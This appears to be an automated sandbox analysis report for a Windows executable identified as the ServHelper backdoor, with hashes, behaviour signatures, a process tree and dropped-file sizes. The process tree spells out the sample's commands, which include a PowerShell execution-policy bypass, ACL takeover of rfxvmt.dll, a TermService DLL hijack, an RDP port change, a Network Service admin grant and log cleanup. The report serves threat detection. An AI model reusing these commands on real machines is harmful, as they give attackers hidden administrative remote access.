Analysis
-
max time kernel
177s -
max time network
174s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
22-12-2023 01:18
General
-
Target
43a5e55b1251affee0cf7494ac9c63b4.exe
-
Size
4.3MB
-
MD5
43a5e55b1251affee0cf7494ac9c63b4
-
SHA1
4a53bd2c188cf869b2a81b047940faf1ea03e1cb
-
SHA256
e2b372effc4c426a1e63d2629bd565eabeeaf042b9e0aea11701e09f42921a3c
-
SHA512
f1dde143fd0be1242a6d211770a60574929283e953262459f9898ac7822e0652aa7fe323fe1e3af36a6082587d36382e7e42d5a4dee74a111800027085e40343
-
SSDEEP
98304:pkucM0/VMuGOcsqLpBX1P3Xhm6SrnsQ2BUotyFoAqae:EM0/COsX1k6AnsFBUQyFoAq
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 2 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\43a5e55b1251affee0cf7494ac9c63b4.exe"C:\Users\Admin\AppData\Local\Temp\43a5e55b1251affee0cf7494ac9c63b4.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iukmoeqw\iukmoeqw.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB84F.tmp" "c:\Users\Admin\AppData\Local\Temp\iukmoeqw\CSC67B972D064344E698B4F151C5A6EC6E4.TMP"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr1⤵
-
C:\Windows\SysWOW64\net.exenet start TermService1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5e2e6bbdcc5cb2b2a8e58e62380cbdeeb
SHA1fd3b0bbf8d08573d022e54ceb111e4dfe93ff752
SHA2562cf90543f0e785093db02f3ce60471d639ec8e5030a2ea0d70187ce55c248cf2
SHA51282ff827ccb3eb01f00713dfcf4d2ef8107c86d206698a366293bb723e36d9a20dba44c818d40e79824fd72c76987e71d69565a3079bccaaa0626d64a13014317
-
Filesize
54KB
MD5e50a78bcc6d94a431add33b3aa6278d1
SHA10555eaf446d2645074c9e28b9f3c55b3ba1593c5
SHA2564375b5155019e09c497714ea54366c719012ec54a22f446428fd2c0f5ca537c7
SHA512b430652795d30a169ddb93e60fa0a0320a91ca61ecb4cead2d7156070a7ac78433a33cd07f211def5d97962673584c6a009d5a59a0eadb9d928417d960cb4945
-
Filesize
1KB
MD5f5b39ca9de2196b4bbfae811bc8d32c1
SHA11a01cb264c9e4a3858d8a49211511a59ad993dfe
SHA25626f30212d6f3b843aed6987488ef783e3537eda51acc0314010c3f78d23b68e7
SHA5128b4cdf60b205454cd23bdb23fb9c43dc84df5eb5ac42d176ce5a6dec430d7942826baea8b959c8b18d8db406935dd70b4e9cfaeed32a6e858904a7fc63b76bbb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.5MB
MD5409a6b954cb72e2cc5b958d620eeb950
SHA121144dbef5b9c8284a1714fefe9595c1ac439b93
SHA256c334f40272d4d0d9b4073b0b232dbdcbf35fcce921fba7048254260d3268dd8d
SHA512c338beba5e43ce1d10ba636ceb7d72c106e5eff6a8272188734224e8269f5fda9bd9d08e0b6070dd7e78af19fd8cf7a2fd939452e9dd057fae5bb567cec58867
-
Filesize
3KB
MD5ca27847aaf169950129155ebefc342ce
SHA126f25227f47d3daadd09efc13dceae396fbd49ff
SHA256ce9c436a6d2eb522fa9f97369baf26fb9af0d57cc1cb77b21fd0daab9db1d28d
SHA5122b931a01e7d89a00f9bc087541c65df5b48ac6cf1ace091962543d02626272e35e59a97eec55d2ad641da25d64b4ee5d965ec61c3e3804f50501c76c36b17f94
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
652B
MD52cb7ec057e3f0d8b3654230fc3f095bd
SHA12d9c0d0ac3d56e5fce5396da256bd98344998499
SHA256e9e08451928974ede243c12f786ec28ce82f6e66335774c8e3de58f74d0be97a
SHA5122565104dcd9a14fc0866b5f7a86e13625d38e8c7be3703de4721fdc003968e826c69e849dabb6cfe7aed1d22b392ee3670c3a457edc58002e78f5089b8dd22fd
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
369B
MD53109141cb0a53aa09b6bf61728f0701b
SHA152571713b45c17c39b3d5c0e16a0bd012a1f8ef7
SHA256b4df7fcf0e9b28efc27f6c7c6c0290141507721f6893af5d73acfcb314eeb8b9
SHA512fe6b9757c39bd2255ed182c9661be274f402da9f9de99bb014202a1354e07e0d1d61849162f33d7b9984c56fcd66d2ac77dcc208aca714e64f1ecc52d47fe217
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
408KB
-
Filesize
64KB
-
Filesize
176KB
-
Filesize
3.3MB
-
Filesize
136KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
6.2MB
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
216KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
104KB
-
Filesize
6.5MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
7.7MB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
80KB
-
Filesize
56KB
-
Filesize
68KB
-
Filesize
600KB
-
Filesize
40KB
-
Filesize
7.7MB
-
Filesize
652KB
-
Filesize
200KB
-
Filesize
64KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
4.1MB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
4.0MB
-
Filesize
64KB
-
Filesize
584KB
-
Filesize
64KB
-
Filesize
40KB
-
Filesize
408KB
-
Filesize
4.1MB
-
Filesize
64KB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
43.3MB
-
Filesize
5.6MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
3.3MB
-
Filesize
304KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
64KB